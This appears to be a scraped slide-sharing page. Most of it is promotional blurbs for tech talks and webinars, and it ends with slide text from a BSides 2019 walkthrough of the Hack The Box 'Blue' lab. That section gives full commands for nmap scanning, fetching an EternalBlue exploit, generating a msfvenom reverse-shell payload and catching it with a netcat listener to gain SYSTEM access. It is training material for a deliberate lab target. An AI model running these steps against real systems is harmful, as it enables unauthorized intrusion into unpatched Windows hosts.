* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI, built on the robust SAP Business Technology Platform (SAP BTP), is the latest and most advanced version of our AI development, reaffirming our commitment to delivering top-tier AI solutions. Skybuffer AI harnesses all the innovative capabilities of the SAP BTP in the AI domain, from Conversational AI to cutting-edge Generative AI and Retrieval-Augmented Generation (RAG). It also helps SAP customers safeguard their investments into SAP Conversational AI and ensure a seamless, one-click transition to SAP Business AI.
With Skybuffer AI, various AI models can be integrated into a single communication channel such as Microsoft Teams. This integration empowers business users with insights drawn from SAP backend systems, enterprise documents, and the expansive knowledge of Generative AI. And the best part of it is that it is all managed through our intuitive no-code Action Server interface, requiring no extensive coding knowledge and making the advanced AI accessible to more users.
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
Choosing The Best AWS Service For Your Website + API.pptx
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on integration of Salesforce with Bonterra Impact Management.
Interested in deploying an integration with Salesforce for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Introduction of Cybersecurity with OSS at Code Europe 2024
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
Generating privacy-protected synthetic data using Secludy and Milvus
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Digital Marketing Trends in 2024 | Guide for Staying Ahead
https://www.wask.co/ebooks/digital-marketing-trends-in-2024
Feeling lost in the digital marketing whirlwind of 2024? Technology is changing, consumer habits are evolving, and staying ahead of the curve feels like a never-ending pursuit. This e-book is your compass. Dive into actionable insights to handle the complexities of modern marketing. From hyper-personalization to the power of user-generated content, learn how to build long-term relationships with your audience and unlock the secrets to success in the ever-shifting digital landscape.
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Finale of the Year: Apply for Next One!
Presentation for the event called "Finale of the Year: Apply for Next One!" organized by GDSC PJATK
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
When it comes to unit testing in the .NET ecosystem, developers have a wide range of options available. Among the most popular choices are NUnit, XUnit, and MSTest. These unit testing frameworks provide essential tools and features to help ensure the quality and reliability of code. However, understanding the differences between these frameworks is crucial for selecting the most suitable one for your projects.
5th LF Energy Power Grid Model Meet-up Slides
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
Building Production Ready Search Pipelines with Spark and Milvus
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on automated letter generation for Bonterra Impact Management using Google Workspace or Microsoft 365.
Interested in deploying letter generation automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
dbms calicut university B. sc Cs 4th sem.pdf
Its a seminar ppt on database management system using sql
Recently uploaded (20)
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Digital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying Ahead
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Letter and Document Automation for Bonterra Impact Management (fka Social Sol...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
BSides Ottawa 2019 - HTB Blue
- 2. WHOAMI • Diana Whitney • IT Security Specialist at EWA-Canada since 2015 • Payment Assurance Lab – PCI PTS POI Standards testing • Secure That Cert! CySA+ and PenTest+
- 3. RECONN WITH NMAP • nmap -sC -sV -O -oA initial 10.10.10.40 • -sC scans the target using the default Nmap scripts • -sV attempts to identify the version of services found running on open ports • -O attempts to ID the host’s operating systems • -oA outputs the scan results into a file called ‘initialscan’ • 10.10.10.40 is our target
- 4. • Port 139 is open and running netbios-ssn • Port 445 is running Microsoft-ds • Ports 135, 49152-7 are running msrpc
- 5. Our scripts used the SMB protocol running on the open ports to lea more about the host: • OS – Windows 7 Pro • Security mode
- 6. MORE NMAP • Initial scan only scans the top 1000 ports • Adding -p- to the command tells nmap to scan all 65535 ports • To scan UDP ports instead of TCP ports • nmap -sU -O -p- -oA udpfull 10.10.10.40
- 7. NMAP VULNERABILITY SCRIPTS • nmap --script vuln -oA vulnerabilities 10.10.10.40 • Previous scan used nmap’s default scripts – fast and non invasive • Vulnerability scripts will look for any potential exploits on the open ports
- 8. • Script smb-vuln-ms17-010 returned a positive result • Code execution vulnerability in MS SMBv1 servers • CVE-2017-0143 - EternalBlue
- 9. • Developed by the NSA and leaked by Shadow Brokers hacker group in 2017 • Exploits SMBv1 protocol in unpatched Windows servers • Allows a remote attacker to execute arbitrary code on a vulnerable machine by sending specially crafted packets • Used in the WannaCry and NotPetya ransomware attacks of 2017 • CVE-2017-0143
- 10. • searchsploit --id ms17-010 • Searchsploit is a command line search tool for Exploit-DB • Not using Metasploit • Searches for possible exploits for this vulnerability – we will use 42315
- 11. • searchsploit -m 42315 • Mirrors the exploit onto our machine • 42315.py
- 12. LET’S EXAMINE THE CONTENTS OF 42315.PY… • There will be a function call for ‘mysmb’ • We can get it from the provided URL using wget
- 13. • File will be saved as 42315.py.1, since we already have a 42315.py • Change the filename: • mv 42315.py.1 mysmb.py
- 14. • The script requires credentials in order to exploit the target • We find them using enum4linux • Since ‘none’ is an option, we can assume this machine allows us to log in with no username or password.
- 15. • Last we need to modify the python code to add a payload • This will be the executable file we send to the target machine and have it run • To gain access to the target, we’ll send a payload that will set up a reverse shell request • Generate the payload using MSFVenom
- 16. • msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.x LPORT=4444 > eternalblue.exe • -p – our payload – windows/shell_reverse_tcp • -f format – exe • LHOST – the IP address of our attack machine (local host) – 10.10.14.7 • Your IP address can be found on HTB ‘Access’ page, or by running ifconfig • LPORT – a port on our machine – we’ll use 4444 since it’s unlikely that it’s being used for anything else • eternalblue.exe – the executable file generated by this command
- 17. • Alter the script to send eternalblue.exe from its location on the host machine to the target machine • Script will then execute eternalblue.exe on the target machine
- 18. • Use Netcat to set up a listener on the attacking machine • nc -nvlp 4444 • The attack machine is now listening for an incoming request from the target machine • Now run the python script • python 42315.py 10.10.10.40
- 19. WHEN the python script runs successfully, the reverse shell request will be by the attack machine. We now have access to the target. Run ‘whoami’ in No privilege escalation required – EternalBlue has granted us system ac